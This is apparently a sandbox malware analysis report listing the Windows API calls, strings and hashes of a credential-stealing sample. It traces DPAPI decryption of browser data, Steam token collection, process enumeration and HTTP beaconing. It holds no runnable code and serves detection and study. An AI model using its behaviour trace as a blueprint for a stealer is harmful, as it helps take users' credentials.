                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425ED8,00425BE3), ref: 0040B2A6
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                          • API String ID: 2813378046-3310892237
                                                                                          • Opcode ID: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                                          • Instruction ID: 4f6f4bd48829af219670311540be59081c9cea49b359b7f79f2b82a8f20ba16d
                                                                                          • Opcode Fuzzy Hash: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                                          • Instruction Fuzzy Hash: F6715D70905248AACB14FBE5D516BDDBBB4AF19308F50417EE805736C2DB78670CCB66
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004064EA
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B44,?,?,?,00425B3F,?), ref: 004065A7
                                                                                            • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                            • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                          • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425B48,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B43), ref: 0040661F
                                                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                          Strings
                                                                                          • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                          • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                          • API String ID: 757424748-3463377506
                                                                                          • Opcode ID: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                          • Instruction ID: b62f1dd5ee535d8e5f8645b721c07d1aad3572f7288e272c7e543ebc5a1b68b9
                                                                                          • Opcode Fuzzy Hash: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                          • Instruction Fuzzy Hash: 7B617170801544EECB25EBA4EA15AEDBBB5EB28304F10507EE506736E2DB381A09CF65
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                            • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                          • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                            • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                            • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                            • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                            • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                          • memcmp.MSVCRT ref: 0040C21C
                                                                                            • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                            • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                            • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                          • String ID: $DPAPI
                                                                                          • API String ID: 2477620391-1819349886
                                                                                          • Opcode ID: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                                          • Instruction ID: 8b9103f373224ef9c7d1e1e34525f01fb5e997a78b4ac406efbcf79e04d5bcd8
                                                                                          • Opcode Fuzzy Hash: 7dfd3c404522f5fba9cfd470d0499fc11dcebd0c230a6c7a8048448d2f3d36ba
                                                                                          • Instruction Fuzzy Hash: 8B21A272D00109ABCF10ABE5CD42AEFBB79AF54314F14027BF901B11D2EA399A958699
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00409143
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040921D
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                          • String ID:
                                                                                          • API String ID: 3423466546-0
                                                                                          • Opcode ID: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                          • Instruction ID: 49701c4b31c8d318cf39a30ad3edccb9fb9ad7eb1a88c61520d5ae36ab01da66
                                                                                          • Opcode Fuzzy Hash: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                          • Instruction Fuzzy Hash: 64B14A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004102C8
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                          • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 599723951-0
                                                                                          • Opcode ID: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                          • Instruction ID: a4a97019f206722b2e8740589aebd7bc91867f573d1150960a86d602fc248a9b
                                                                                          • Opcode Fuzzy Hash: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                          • Instruction Fuzzy Hash: 23210CB1A00118EBCB10EFA5CD55AEEBBB9AF58348F50407EE405F3691CB785A488B65
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004024F0
                                                                                            • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                            • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                            • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                          • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                            • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                          • memset.MSVCRT ref: 00402540
                                                                                          Similarity
                                                                                          • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 3248666761-0
                                                                                          • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                          • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                                          • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                          • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041332B
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00413348
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041340C
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrlen
                                                                                          • String ID: ERROR
                                                                                          • API String ID: 2133942097-2861137601
                                                                                          • Opcode ID: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                                          • Instruction ID: 77545b96f9c55e0de6ec71263cb7e0cfa71b0ad252d2fb84a837ede919fdf13f
                                                                                          • Opcode Fuzzy Hash: 457c7dca167f6097eb3decf56045153080dc014ab3c7bbf54f3f61cdd9435eba
                                                                                          • Instruction Fuzzy Hash: 133172B1900148AFCB00EFA9D956BDD7FB4AB15304F10803EF405A7282DB389648CBA9
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041303F
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                            • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                            • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                            • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                            • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                            • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                            • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                            • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                          Similarity
                                                                                          • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                          • String ID: ERROR$ERROR
                                                                                          • API String ID: 1120091252-2579291623
                                                                                          • Opcode ID: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                          • Instruction ID: 9cf05e6fcab295474e65acada3454b7dde9d8d835f49f967da0029279a9dc82d
                                                                                          • Opcode Fuzzy Hash: aefbf7741ce3e4e0e52d37c23a8d594d106d3e01a68b0f1fcaa8373cdeccc4c0
                                                                                          • Instruction Fuzzy Hash: FC210EB0900189EADB14FFA5C556BDDBBF4AF18348F50417EE80563682DB785B0CCB66
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                                          • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                          • String ID: 2IA
                                                                                          • API String ID: 3183270410-4174278054
                                                                                          • Opcode ID: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                          • Instruction ID: 8552e384592846dc61b773d54a0908cfb1ecd9fdbc452b9aa5e823a114c6ff4c
                                                                                          • Opcode Fuzzy Hash: 30d4ffeda736fd64e0374663d8f4d70df638ccef9048597482ecb454b1010210
                                                                                          • Instruction Fuzzy Hash: 85F03079905228BBEB60AB90DC49FDD3B78AB09715F000061BE85A61D0DBB4AAC4CBD4
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00413460: _EH_prolog.MSVCRT ref: 00413465
                                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 2678630583-0
                                                                                          • Opcode ID: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                          • Instruction ID: 90c6c212f9a98d1f3efa3e19a0f967dde8f702bf728512cfd2e6caf086527d46
                                                                                          • Opcode Fuzzy Hash: fb7f86a4d038d58da3621eb36abdba5b43a6fdb478c7a05049313af6d209da56
                                                                                          • Instruction Fuzzy Hash: 3E311E75900148AFCB11DFA4C995ADEBBB8FF18304F50412FF906A7281DB789B88CB95
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6%@$6%@
                                                                                          • API String ID: 0-3369382886
                                                                                          • Opcode ID: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                          • Instruction ID: badd9bf96c2c88f43ed760c6ea304aae97d5f1f2e5982ea7d2ae84e0ed7fb19c
                                                                                          • Opcode Fuzzy Hash: 1671fecbb1ebbe02e7eb2cc7cf41ad1b7ad139c209bd50c1cd2ae32b560b646f
                                                                                          • Instruction Fuzzy Hash: 9C4146716001199FCB01CF69D8806EDBBB1FF89318F1484BADC55EB395C3B8A982CB54
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041453D
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0042655B), ref: 0041458E
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Strings
                                                                                          • Soft\Steam\steam_tokens.txt, xrefs: 004145A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                          • String ID: Soft\Steam\steam_tokens.txt
                                                                                          • API String ID: 40794102-3507145866
                                                                                          • Opcode ID: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                          • Instruction ID: 1e33fb55044e108cdc823b8717a6e4474b59c1838e8e2ba6a3b9a54ee3721495
                                                                                          • Opcode Fuzzy Hash: 5dea421be7ed3263a5a25ba242280bcfb85689912c92a282fb01fad9efacc230
                                                                                          • Instruction Fuzzy Hash: 61215B71C00148AACB14FBE5C966BDDBB74AF18308F50817EE411725D2DB78174CCA66
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004071CB
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00407402
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00407416
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3193997572-0
                                                                                          • Opcode ID: 9c7e708cd882b152c105328016b18edc6413fade68d22c0f532ea058ca18a39d
                                                                                          • Instruction ID: 126ac542581dd9a9e00b668703c25f94ef807883601db8bc0808eb5b6dcb11bd
                                                                                          • Opcode Fuzzy Hash: 9c7e708cd882b152c105328016b18edc6413fade68d22c0f532ea058ca18a39d
                                                                                          • Instruction Fuzzy Hash: 12A14D71904248EADB15EBE4D955BEDBBB4AF18308F5040BEE406735D2DB782B0CDB26
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004165DE
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00416620
                                                                                          • lstrcat.KERNEL32(?), ref: 0041663F
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 004162AF: _EH_prolog.MSVCRT ref: 004162B4
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 004162D4
                                                                                            • Part of subcall function 004162AF: FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                            • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                            • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416346
                                                                                            • Part of subcall function 004162AF: StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416374
                                                                                            • Part of subcall function 004162AF: PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                            • Part of subcall function 004162AF: lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                            • Part of subcall function 004162AF: wsprintfA.USER32 ref: 00416388
                                                                                            • Part of subcall function 004162AF: CopyFileA.KERNEL32(?,00000000,00000001), ref: 004164DD
                                                                                            • Part of subcall function 004162AF: DeleteFileA.KERNEL32(00000000), ref: 0041655B
                                                                                            • Part of subcall function 004162AF: FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                            • Part of subcall function 004162AF: FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$FileH_prologwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                          • String ID:
                                                                                          • API String ID: 3101948222-0
                                                                                          • Opcode ID: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                          • Instruction ID: 6e5b766fc683c4e74d5122aabce2b8c3392ef196e7b74699665c3906b53d7570
                                                                                          • Opcode Fuzzy Hash: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                          • Instruction Fuzzy Hash: 5A41AD7194022DABCF10EBF0EC13DED7B79AB18314F00466AF844A2192E77997958B96
                                                                                          APIs
                                                                                          • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                          Strings
